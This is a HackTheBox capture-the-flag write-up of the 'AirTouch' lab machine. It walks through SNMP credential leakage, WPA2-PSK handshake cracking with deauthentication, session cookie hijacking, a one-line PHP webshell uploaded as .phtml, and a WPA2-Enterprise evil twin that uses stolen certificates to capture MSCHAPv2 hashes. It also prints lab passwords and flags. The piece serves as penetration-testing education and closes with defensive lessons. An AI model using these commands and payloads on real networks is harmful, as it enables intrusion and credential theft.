AirTouch — HackTheBox

Difficulty: Medium | OS: Linux (Ubuntu 20.04) | Release: January 2026
CVEs: None (wireless misconfiguration chain)
Author: jkonpc | February 27, 2026

---

Executive Summary

AirTouch is a medium-difficulty Linux machine that simulates a segmented corporate wireless environment across three VLANs. Exploitation chains through SNMP credential leakage, WPA2-PSK handshake capture and cracking, wireless traffic decryption for session hijacking, PHP upload filter bypass, legitimate certificate theft for a WPA2-Enterprise evil twin attack, and MSCHAPv2 hash cracking to pivot across all three network segments for full compromise.

Property	Value
Target IP	10.129.244.98
Open Ports	22/tcp (SSH), 161/udp (SNMP)
Network Segments	Consultant (172.20.1.0/24), Tablets (192.168.3.0/24), Corp (10.10.10.0/24)
User Flag	c85a8af90006711db25bfe7084ea368f
Root Flag	a99ebcc5f1d3ba156b64be95c0e4eeb9

---

Attack Chain Overview

1. Initial Foothold (consultant): SNMP enumeration leaks SSH credentials → root via sudo NOPASSWD: ALL
2. Tablet VLAN Access: WPA2-PSK handshake capture on AirTouch-Internet → aircrack-ng cracks PSK (challenge) → wireless association to 192.168.3.0/24
3. Router Compromise (user): Wireless traffic decryption in Wireshark → session cookie theft → cookie manipulation for admin upload access → PHP extension filter bypass (.phtml) → webshell → credential recovery from login.php → SSH as user → user flag
4. Corp VLAN Access (root): Certificate theft from gateway → EAPHammer evil twin with legitimate certs against AirTouch-Office → MSCHAPv2 hash capture → hashcat crack (r4ulcl:laboratory) → WPA2-Enterprise association to 10.10.10.0/24 → SSH as remote → hostapd credential recovery → su admin → sudo su → root flag

---

Phase 1: Reconnaissance

Service Enumeration

A standard TCP scan reveals a minimal attack surface — only SSH is externally accessible:

$ nmap -sC -sV -p- 10.129.244.98 -Pn

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The UDP Blind Spot

TCP-only scanning is a common pitfall. A targeted UDP probe using onesixtyone reveals SNMP (port 161) with a leaked credential in the system description:

$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 10.129.244.98

10.129.244.98 [public] "The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)"

Discovery	Detail
Hostname	AirTouch-Consultant
SSH Credentials	consultant:RxBlZhLmOkacNWScmZ6D
Source	SNMP sysDescr field via public community string

---

Phase 1: Exploitation — Establishing the Pivot Point

SSH Access & Local Privilege Escalation

The leaked credentials grant SSH access. The consultant user has unrestricted sudo privileges:

$ ssh consultant@10.129.244.98

consultant@AirTouch-Consultant:~$ sudo -l
User consultant may run the following commands on AirTouch-Consultant:
    (ALL) NOPASSWD: ALL

consultant@AirTouch-Consultant:~$ sudo su
root@AirTouch-Consultant:~#

Root on the Consultant box is not the objective — it is a prerequisite. Root privileges are required to manipulate wireless interfaces into monitor mode for the attacks ahead.

Network Topology

The home directory contains network diagrams (diagram-net.png) revealing a three-VLAN architecture behind a NAT router:

VLAN	Subnet	SSID	Gateway
Consultant	172.20.1.0/24	Wired (eth0)	172.20.1.1
Tablets	192.168.3.0/24	AirTouch-Internet	192.168.3.1
Corporate	10.10.10.0/24	AirTouch-Office	10.10.10.1

The machine exposes seven virtual wireless interfaces (wlan0–wlan6) and has EAPHammer pre-installed in /root/eaphammer/, signaling that wireless attacks are the intended pivot mechanism.

Wireless Reconnaissance

Bringing up a wireless interface and scanning reveals the target networks:

# ip link set wlan0 up
# iw dev wlan0 scan

SSID	BSSID	Channel	Auth	Band
AirTouch-Internet	f0:9f:c2:a3:f1:a7	1	802.1X (Enterprise)	2.4GHz
AirTouch-Internet	f0:9f:c2:a3:f1:a7	6	WPA2-PSK	2.4GHz
AirTouch-Office	ac:8b:a9:f3:a1:13	44	802.1X (Enterprise)	5GHz
AirTouch-Office	ac:8b:a9:aa:3f:d2	44	802.1X (Enterprise)	5GHz

The PSK instance of AirTouch-Internet on channel 6 is the entry point — WPA2-PSK can be cracked with a captured handshake.

---

Phase 2: Breaching the Tablet VLAN (WPA2-PSK)

Handshake Capture

A monitor-mode interface is configured on channel 6 to capture the WPA2 4-way handshake:

# airmon-ng start wlan3
# iwconfig wlan3mon channel 6
# airodump-ng wlan3mon --channel 6 --bssid f0:9f:c2:a3:f1:a7 -w /tmp/handshake

A deauthentication attack on a separate interface forces the connected tablet client to reconnect, generating the handshake:

# airmon-ng start wlan5
# iwconfig wlan5mon channel 6
# aireplay-ng --ignore-negative-one -0 10 -a f0:9f:c2:a3:f1:a7 -c 28:6C:07:FE:A3:22 wlan5mon

Airodump confirms capture: [ WPA handshake: F0:9F:C2:A3:F1:A7 ]

Cracking the PSK

# aircrack-ng /tmp/handshake-01.cap -w /usr/share/wordlists/rockyou.txt

KEY FOUND! [ challenge ]

Credential	Value
SSID	AirTouch-Internet
PSK	challenge

Connecting to the Tablet VLAN

# wpa_passphrase "AirTouch-Internet" "challenge" > /tmp/wpa.conf
# wpa_supplicant -B -i wlan4 -c /tmp/wpa.conf
# dhclient wlan4
# ip a show wlan4
    inet 192.168.3.8/24

A host scan of the new subnet reveals the gateway:

# nmap -sn 192.168.3.0/24
# nmap -sCV 192.168.3.1

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1
53/tcp open  domain
80/tcp open  http    Apache/2.4.41 (Ubuntu)

---

Phase 3: Router Exploitation — Lateral Movement

Wireless Traffic Decryption

The router’s web interface at 192.168.3.1 requires credentials we don’t have. Since we possess the WPA2-PSK, we can decrypt captured wireless traffic to steal an authenticated session.

Using the airodump capture file (which must contain both the handshake and subsequent data frames), the traffic is decrypted in Wireshark:

Edit → Preferences → Protocols → IEEE 802.11 → Decryption Keys:

• Key Type: wpa-psk
• Key: (hex PSK from wpa_passphrase output)

Filtering on http reveals a tablet client’s requests to the router, including session cookies:

Cookie: PHPSESSID=8ufkslsjhr534hh9r3cgmf2cv4; UserRole=user

Session Hijacking & Cookie Manipulation

An SSH local port forward provides browser access to the router:

$ ssh -L 8081:192.168.3.1:80 consultant@10.129.244.98

Setting the stolen PHPSESSID cookie in the browser authenticates the session. Modifying UserRole from user to admin via the browser console unlocks the administrative upload feature:

document.cookie = "UserRole=admin; path=/";

PHP Filter Bypass

The upload form filters .php extensions. Apache commonly accepts alternative PHP extensions — renaming the payload to .phtml bypasses the filter:

<?php system($_GET['c']); ?>

The webshell is accessible at /uploads/shell.phtml and executes as www-data.

Credential Recovery

The webshell reveals hardcoded credentials in the login page source:

http://localhost:8081/uploads/shell.phtml?c=cat+/var/www/html/login.php

'admin'   => array('password' => 'JunDRDZKHDnpkpDDvay', 'role' => 'admin'),
'manager' => array('password' => '2wLFYNh4TSTgA5sNgT4', 'role' => 'user'),

User Flag

SSH access to the gateway as user with password admin (a separate local account, not the web credentials) provides the user flag:

$ ssh user@192.168.3.1

user@AirTouch-AP-PSK:~$ sudo -l
    (ALL) NOPASSWD: ALL

user@AirTouch-AP-PSK:~$ sudo cat /root/user.txt
c85a8af90006711db25bfe7084ea368f

Credential	Value
SSH User	user:admin
Web Admin	admin:JunDRDZKHDnpkpDDvay
User Flag	c85a8af90006711db25bfe7084ea368f

---

Phase 4: Evil Twin Attack (WPA2-Enterprise)

Certificate Theft

The gateway’s /root/ directory contains a certificate synchronization script and a backup of the RADIUS server’s TLS certificates:

user@AirTouch-AP-PSK:~$ sudo cat /root/send_certs.sh

REMOTE_USER="remote"
REMOTE_PASSWORD="xGgWEwqUpfoOVsLeROeG"
REMOTE_PATH="~/certs-backup/"
LOCAL_FOLDER="/root/certs-backup/"
sshpass -p "$REMOTE_PASSWORD" scp -r "$LOCAL_FOLDER" "$REMOTE_USER@10.10.10.1:$REMOTE_PATH"

user@AirTouch-AP-PSK:~$ sudo ls /root/certs-backup/
ca.conf  ca.crt  server.conf  server.crt  server.csr  server.ext  server.key

These are the legitimate CA and server certificates used by the AirTouch-Office RADIUS server. With these, an evil twin AP will present a trusted certificate chain, causing enterprise clients to authenticate without warning.

The certificates are transferred to the Consultant box and imported into EAPHammer:

# ./eaphammer --cert-wizard import --server-cert ~/server.crt --ca-cert ~/ca.crt --private-key ~/server.key

Evil Twin Execution

EAPHammer is launched on a managed wireless interface, broadcasting AirTouch-Office on channel 44 with the stolen certificates:

# ip link set wlan6 up
# ./eaphammer --creds -i wlan6 -e "AirTouch-Office" -c 44 --auth wpa-eap

Deauthentication frames are sent from a monitor interface to disconnect clients from the real APs:

# iwconfig wlan2mon channel 44
# aireplay-ng --deauth 10 -a ac:8b:a9:f3:a1:13 wlan2mon
# aireplay-ng --deauth 10 -a ac:8b:a9:aa:3f:d2 wlan2mon

Corporate clients reconnect to the rogue AP and perform PEAP-MSCHAPv2 authentication. EAPHammer captures the challenge/response:

mschapv2:
     domain\username:    AirTouch\r4ulcl
     username:           r4ulcl
     challenge:          60:fc:ec:b9:6b:5c:79:b3
     response:           37:5f:91:83:cc:80:5a:e9:9a:fd:66:57:14:ec:64:0d:a2:eb:ae:0a:1d:ae:5f:ae
     hashcat NETNTLM:    r4ulcl::::375f9183cc805ae99afd665714ec640da2ebae0a1dae5fae:60fcecb96b5c79b3

Cracking MSCHAPv2

$ hashcat -m 5500 r4ulcl::::375f9183cc805ae99afd665714ec640da2ebae0a1dae5fae:60fcecb96b5c79b3 /usr/share/wordlists/rockyou.txt

r4ulcl::::375f9183cc805ae99afd665714ec640da2ebae0a1dae5fae:60fcecb96b5c79b3:laboratory

Status: Cracked

Credential	Value
Username	r4ulcl
Domain	AirTouch
Password	laboratory
Source	MSCHAPv2 capture via evil twin

---

Phase 5: Corporate VLAN — Root Compromise

WPA2-Enterprise Association

A wpa_supplicant configuration is created for PEAP authentication:

ctrl_interface=/var/run/wpa_supplicant
ap_scan=1
network={
    ssid="AirTouch-Office"
    scan_ssid=1
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="AirTouch\r4ulcl"
    password="laboratory"
    phase1="peapver=0"
    phase2="auth=MSCHAPV2"
}

# wpa_supplicant -B -i wlan6 -c /tmp/office.conf
# dhclient wlan6
# ip a show wlan6
    inet 10.10.10.10/24

Accessing the Management Host

The remote credentials from send_certs.sh provide SSH access to the Corp VLAN gateway:

$ ssh remote@10.10.10.1
Password: xGgWEwqUpfoOVsLeROeG

Credential Recovery from hostapd

Standard enumeration on the management host reveals hostapd running the enterprise RADIUS authentication. Inspecting running processes leads to the EAP user database:

remote@AirTouch-AP-MGT:~$ cat /etc/hostapd/hostapd_wpe.eap_user

"AirTouch\r4ulcl"   MSCHAPV2   "laboratory"  [2]
"admin"              MSCHAPV2   "xMJpzXt4D9ouMuL3JJsMriF7KZozm7"  [2]

Root Flag

remote@AirTouch-AP-MGT:~$ su admin
Password: xMJpzXt4D9ouMuL3JJsMriF7KZozm7

admin@AirTouch-AP-MGT:~$ sudo su

root@AirTouch-AP-MGT:~# cat /root/root.txt
a99ebcc5f1d3ba156b64be95c0e4eeb9

Root Flag: a99ebcc5f1d3ba156b64be95c0e4eeb9

---

Lessons Learned

SNMP as an Overlooked Attack Surface: The machine’s only TCP port was SSH, which would dead-end most testers who skip UDP enumeration. SNMP’s sysDescr field contained plaintext credentials — a realistic misconfiguration found frequently in enterprise network appliances and IoT devices. Penetration testers should always include UDP scanning (especially ports 161, 500, and 123) in their methodology.

WPA2-PSK Cracking Remains Trivial for Weak Passwords: The AirTouch-Internet PSK (challenge) was cracked from rockyou.txt in under a second. Organizations deploying WPA2-PSK should enforce minimum password length and complexity requirements, or migrate to WPA2-Enterprise for networks carrying sensitive traffic.

Wireless Traffic Decryption with Known PSK: Possessing the WPA2-PSK along with a captured 4-way handshake allows full decryption of wireless traffic for all clients. This enabled session cookie theft without any active man-in-the-middle attack. Networks transmitting sensitive data over WiFi should enforce TLS at the application layer to protect against this class of passive interception.

Certificate Theft Enables Trusted Evil Twins: The initial evil twin attempt with self-signed certificates failed because enterprise clients validated the certificate chain. Only after recovering the legitimate CA and server certificates from the compromised gateway did the attack succeed. This highlights the importance of protecting RADIUS certificates and private keys — if an attacker obtains them, WPA2-Enterprise’s primary advantage over PSK (per-user authentication with mutual certificate validation) is neutralized.

Cleartext Credentials in Configuration Files: The attack chain recovered credentials from SNMP descriptions, PHP source code, shell scripts, and hostapd configuration files. Each credential enabled the next pivot. Secrets management, even in internal infrastructure, should avoid plaintext storage in favor of vaults, environment variables, or encrypted configuration.

---

Tools Used

Tool	Purpose
nmap	TCP/UDP service enumeration
onesixtyone	SNMP community string brute-force and enumeration
airmon-ng	Wireless interface monitor mode management
airodump-ng	Wireless traffic capture and handshake collection
aireplay-ng	Client deauthentication attacks
aircrack-ng	WPA2-PSK handshake cracking
wpa_supplicant	WPA2-PSK and WPA2-Enterprise network association
dhclient	DHCP IP address acquisition
Wireshark	Wireless traffic decryption and HTTP session analysis
EAPHammer	WPA2-Enterprise evil twin AP with credential capture
hashcat	MSCHAPv2 (NetNTLMv1) hash cracking
curl	Web application interaction and enumeration
SSH port forwarding	Tunneling HTTP traffic to attacker browser

CVE Reference

CVE	Component	Description
N/A	SNMP Configuration	Plaintext credentials stored in sysDescr field, accessible via default public community string
N/A	AirTouch-Internet	Weak WPA2-PSK passphrase (challenge) crackable with standard wordlists
N/A	PSK Router (Apache/PHP)	File upload filter bypass via .phtml extension; hardcoded credentials in login.php; UserRole cookie-based authorization without server-side validation
N/A	AirTouch-AP-PSK Gateway	RADIUS CA certificate and private key stored in plaintext on gateway; cleartext credentials in send_certs.sh
N/A	AirTouch-AP-MGT	Cleartext user credentials in hostapd_wpe.eap_user configuration file